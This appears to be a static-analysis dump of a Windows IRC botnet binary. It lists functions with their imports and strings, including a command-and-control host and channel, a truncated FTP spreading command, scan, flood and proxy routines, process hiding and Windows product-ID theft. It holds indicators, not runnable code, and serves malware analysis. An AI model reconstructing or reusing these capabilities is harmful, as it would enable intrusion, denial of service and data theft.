sub_outside(): KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First MSVCRT.strncmp KERNEL32.Process32Next MSVCRT.strstr MSVCRT.strncpy MSVCRT.wcscat MSVCRT.ftell MSVCRT.fseek WS2_32.send WS2_32.recv WS2_32.ntohs WS2_32.recvfrom WS2_32.inet_ntoa MSVCRT.atoi MSVCRT.rand MSVCRT.free MSVCRT.sprintf KERNEL32.InterlockedCompareExchange MSVCRT._errno MSVCRT._strlwr KERNEL32.CreateFileA |
sub_406890(0038): "95" "NT" "98" "ME" "2000" "XP" "2003" "???" "%s [%s]" "CPU: %dMHz. Memory: %dMB/%dMB. OS: Win "... |
sub_4227F0(006c): "asn" |
sub_420300(0303): "ServicesActive" |
sub_41A6D0(031f): WS2_32.select |
sub_4066E0(0352): "up: %dd %dh %dm" |
sub_430FE0(03f4): KERNEL32.InterlockedCompareExchange |
sub_407790(085a): "scorti1.dns2go.com" "7000" "scorti1.dns2go.com" "#scop#" "#s" "servec" "hotfixs.exe" "hoewrt" "TAHY-" "abosal7" "E10ADC3949BA59ABBE56E057F20F883E" "admin.com" "TsInternetUser" |
sub_41B950(0a58): MSVCRT.rand |
sub_42C810(0a6a): "tcp" "ftp" "tcp" |
sub_40B700(0cb7): "true" |
sub_422A40(113c): MSVCRT.atoi WS2_32.send MSVCRT.strrchr "scan: cip (%s)" "scan: not started" " " "ftp: port: %d, total sends: %d" "scan: stopped (%d threads)" "scan: couldn't stop" " " "scan: too many threads (%s)" " " "scan: stats:" " %s: %d," " total: %d" " " " " " " " " " " "scan: invalid port" " " " " " " "scan: no ip specified" "random" "sequential" "Scan(%s): %s Port Scan %s:%d - Delay %d"... |
sub_42A5F0(1c28): WS2_32.socket WS2_32.sendto WS2_32.closesocket |
sub_40EF90(1d2e): "ServicesActive" |
sub_426CE0(2203): WS2_32.socket |
sub_419F50(25b1): MSVCRT.strstr |
sub_41EF30(2644): WS2_32.send MSVCRT.atoi "220 \r\n" "220 \r\n" "331 \r\n" "331 \r\n" "230 \r\n" "230 \r\n" "200 \r\n" "200 \r\n" " " "," "," "," "," "," "," "%d.%d.%d.%d" "200 \r\n" "200 \r\n" "150 \r\n" "150 \r\n" "rb" "ftp: %d.%d.%d.%d -> (%d bytes) (total s"... "226 \r\n" "226 \r\n" "221 \r\n" "221 \r\n" |
sub_4192C0(278b): MSVCRT._stricmp WS2_32.ntohs " " "established" "listening" "%s:%d" "%s:%d" "%s: %d" "%s: %s" |
sub_413B70(2857): ":" ":" ":" |
sub_428250(28e3): WS2_32.closesocket |
sub_42A810(2da3): WS2_32.select WS2_32.recv WS2_32.send |
sub_423660(2e37): "%d.%d.%d.%d" |
sub_42CB10(2f99): MSVCRT.fprintf MSVCRT.strncmp "Control socket read failed" "%s" "%s" |
sub_41A2B0(313f): WS2_32.WSAGetLastError WS2_32.select |
sub_411FE0(3261): " " " " "%s" " " "%s" " " " " "%s %s %s\r\n" " " "%s %s\r\n" " " " " " " " " " " |
sub_40D580(3355): "kernel32.dll" "RegisterServiceProcess" "CreateToolhelp32Snapshot" "Process32First" |
sub_4137E0(387f): "%2.2X" |
sub_426A60(400d): "%s: %s:%u (%dseconds)" "%s: error creating threads" "%s: attack@%s:%d done." "%s" |
sub_425020(418d): WS2_32.ntohs "cmd /c echo open %s %d >> ii &echo user"... |
sub_40F030(41a8): "ServicesActive" |
sub_41D830(4ba5): ":" ":" ":" "ftp(badlogin)" "ftp(getting)" "ftp(baddl)" "http(badconnect)" "GET %s HTTP/1.0\r\nConnection: Keep-Alive"... "http(getting)" "wb" "http(badopen)" "\r\n\r\n" "dl, done. %s ." "open %s." "dl'ed-update: %s" "exec.error" |
sub_423760(4bd5): MSVCRT.rand "%d.%d.%d.%d" |
sub_40F0B0(4f1f): "ServicesActive" |
sub_414D40(4f91): " " " " |
sub_429DC0(51e7): WS2_32.recv WS2_32.ioctlsocket WS2_32.closesocket |
sub_42D2C0(5357): MSVCRT.sprintf "Missing path argument for file transfer"... "Invalid open type %d\n" |
sub_427AD0(5954): WS2_32.recv |
sub_6179A7(62b3): KERNEL32.CreateFileA |
sub_40FF60(642f): MSVCRT.strstr "%d.%d.%d.%d" "%s %s\r\n" "%s %s\r\n%s %s 0 0 :%s\r\n" " " " " " " " " "%s %s\r\n" " " " " " " "%s %s\r\n" "%s %s %s\r\n" " " "%s %s %s\r\n" "%s %s\r\n" " " " " ":" "|" "|" " -s" " -n" " -o" " " " " "|" "|" " " " -o" " -s" " -n" ":" " " "!" "!" " " " " " :" " " " " " " " " " " ":" "!" "%s %s %s\r\n" " " ":" "!" " :" " :" " " " " ":" "!" ":" "!" ":" "!" |
sub_4266A0(69b7): "%s: %s (%utimes/%ubytes/%dms)" "[%s] Finished flooding %s %d Times" "[%s] Cannot send pings - Doesn't have D"... |
sub_4207E0(6fb8): "AudioSrv" "Browser" "CryptSvc" "Dhcp" "dmserver" "Dnscache" "ERSvc" "Eventlog" "EventSystem" "FastUserSwitchingCompatibility" "helpsvc" "lanmanserver" "lanmanworkstation" "LmHosts" "Netman" "PlugPlay" "PolicyAgent" "ProtectedStorage" "RasMan" "RpcSs" "SamSs" "Schedule" "seclogon" "SENS" "ShellHWDetection" "Spooler" "SSDPSRV" "stisvc" "TapiSrv" "TermService" "TrkWks" "upnphost" "W32Time" "winmgmt" "WZCSVC" "wuauserv" "Themes" "SYSTEM\\CurrentControlSet\\Services\\%s" "[%s] [????.exe] (Unknown key)" "ImagePath" "[%s] [????.exe]" "[%s] [%s]" |
sub_4256B0(7228): WS2_32.closesocket |
sub_426EB0(75a9): "syn" |
sub_4269A0(75a9): "forsyn" |
sub_42A090(75a9): "Socks4" |
sub_427590(75a9): "udp" |
sub_426450(75a9): "ping" |
sub_429D00(75a9): "Socks4" |
sub_4299C0(75a9): "HTTP" |
sub_40A180(7c6d): MSVCRT.strstr |
sub_4282C0(7e42): MSVCRT.strncat MSVCRT.strstr WS2_32.recv WS2_32.send WS2_32.closesocket " " " " "http" " " "CONNECT" "connect" " " ":" " " ":" " " ":" " " " " "HTTPROX" "\r\n" "\r\n" "\r\n" "Proxy-Connection:" ":" "Keep-Alive" "%s %s %s\r\nConnection: Keep-Alive\r\n%s" "%s %s %s\r\nConnection: close\r\n%s" "\r\n" "\r\n" " " " " " " "Transfer-Encoding:" " " "chunked" " " "Connection:" " " "Keep-Alive" "\r\n" "\r\n" "\r\n" "Connection: Keep-Alive\r\n" "Connection: Keep-Alive\r\n" "Connection: Close\r\n" "Connection: Close\r\n" "\r\n" "HTTP/1.0 200 Connection established\r\n\r\n"... "HTTP/1.0 503 Service Unavailable\r\nServe"... "HTTP/1.0 503 Service Unavailable\r\nServe"... |
sub_42DE20(7fe2): "net_write(1) returned %d, errno = %d\n" "net_write(2) returned %d, errno = %d\n" |
sub_429C30(80fe): "[%s] Starting proxy on %d with SSL." "[%s] Starting proxy on port %d." "[%s] Unloaded proxy on port %d." |
sub_40B680(8930): "true" |
sub_42EA40(89f2): MSVCRT.free "QUIT" |
sub_433A20(9072): "" |
sub_4034E0(917c): "|" "a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t"... |
sub_40CF60(99fb): MSVCRT._snprintf "%s\\*" "Found: %s\\%s" |
sub_40A0C0(9cfe): MSVCRT.strchr |
sub_42CC50(9d15): "\r\n" "read" |
sub_42DFD0(a081): MSVCRT.free |
sub_42E400(a476): MSVCRT.fread MSVCRT.fwrite "short write: passed %d, wrote %d\n" "localfile write" |
sub_420530(a712): "PSAPI.DLL" "PSAPI.DLL" "EnumProcessModules" "GetModuleFileNameExA" "unknown" |
sub_42B540(a916): WS2_32.ioctlsocket WS2_32.recv WS2_32.send WS2_32.closesocket |
sub_42B880(ad1c): "[%s] Redirecting from Port %d to '%s:%d"... "[%s] Finished redirecting from port %d "... |
sub_428040(b1b6): "[%s] Started redirect from \"%s\" to \"%s\""... "[%s] Finished redirect from \"%s\" to \"%s"... |
sub_41E660(b206): "%d. - Pid: %d - \"%s\"" " " " " " " " " " " " " " " " " |
sub_42AEC0(b679): WS2_32.accept |
sub_40CBB0(b774): " " " " "\\" "Files Found: %d" |
sub_40ED70(b9b6): "ServicesActive" "\"%s\" %s" |
sub_404C70(ba3a): " " " " "exec.error" " " " " "open" " " " " " " "%s resolved %s" " " " " "%s -> %s" " " "resolve.error %s." "%s %s\r\n" "%s" " " "Executed: %s." "exec.error" " " "%s" "%s %s\r\n" " " "N" "Software\\Microsoft\\OLE" |
sub_42F840(bc3a): MSVCRT._errno |
sub_40DB40(bf96): "%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n" "%%comspec%% /c %s %s" |
sub_431280(c129): "KERNEL32.DLL" "InterlockedCompareExchange" |
sub_42B3A0(c8ab): WS2_32.recv WS2_32.send |
sub_403FC0(c984): "%s %s\r\n" "%s" |
sub_404640(caf0): " -o" " " " " " " " " |
sub_42D580(cbda): "Invalid direction %d\n" "Invalid mode %c\n" "PASV" "%u,%u,%u,%u,%u,%u" "getsockname" "setsockopt" "setsockopt" "connect" "bind" "listen" "PORT %d,%d,%d,%d,%d,%d" "calloc" |
sub_431560(cbe3): MSVCRT.free |
sub_424840(cd36): "BBBB" "CCCC" |
sub_42D0D0(cf06): MSVCRT.sprintf "USER %s" "PASS %s" |
sub_41C610(d173): " " ":" " " " " ":" " " " " ":" " " " " " " " " " " " " " " " " " " |
sub_41BC90(d56c): MSVCRT.strtok |
sub_40C400(dfd5): " " "[DCC]: Failed to create socket." "dcc: failed to bind socket" "dcc: failed to open socket" "dcc: file doesn't exist" "[DCC]: File doesn't exist." "dcc: timeout" "dcc: unable to open socket" "dcc: complete to %s, file: %s, (%d byte"... "dcc: socket error" |
sub_426820(dfe9): IPHLPAPI.IcmpCreateFile IPHLPAPI.IcmpSendEcho IPHLPAPI.IcmpCloseHandle "ICMP.DLL" "IcmpCreateFile" "IcmpCloseHandle" "IcmpSendEcho" |
sub_406C30(e160): MSVCRT.strtok " " " " "-update" "-netsvcs" "-bai" "-bai" " " " " |
sub_420E10(e23f): ":" "http" "ftp" "/" "/" ":" "/" ":" "http" "ftp" "/" ":" "/" ":" ":" "/" ":" "http" "ftp" "/" "/" "/" "/" |
sub_4277C0(e2dd): MSVCRT.rand WS2_32.sendto |
sub_41FF90(e51b): "unknown" |
sub_4356F0(e664): " " " " " " " " " " " " " " " " "HKCR: %s" " " " " "HKU: %s" "Software\\Microsoft\\Windows\\CurrentVersi"... "ProductId" "Found Windows Product ID (%s)." |
sub_424E20(e942): WS2_32.send |
sub_427650(e9eb): "%s: %s:%u (%ut/%ub/%dms)" "%s: %s:%d done" |
sub_42A150(f0d5): "[%s] Starting Socks4 Proxy on port %d." "[%s] Unloaded proxy on %d." |
sub_426F70(f15c): "%s: %s:%u (%usec/%dms)" |
sub_419AE0(f59b): MSVCRT.strncpy "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" |
sub_4200F0(f5f2): "SYSTEM\\CurrentControlSet\\Services\\%s" "ImagePath" "\\" |
sub_41F860(f6b9): MSVCRT.rand WS2_32.closesocket |
sub_40EC30(f82c): "-netsvcs" |
sub_431900(f851): MSVCRT.free |
sub_4126B0(f93f): "%d.%d.%d.%d" |
sub_42D1A0(fcd1): "%s\n" |
sub_61F9A6(fe46): KERNEL32.CreateFileA |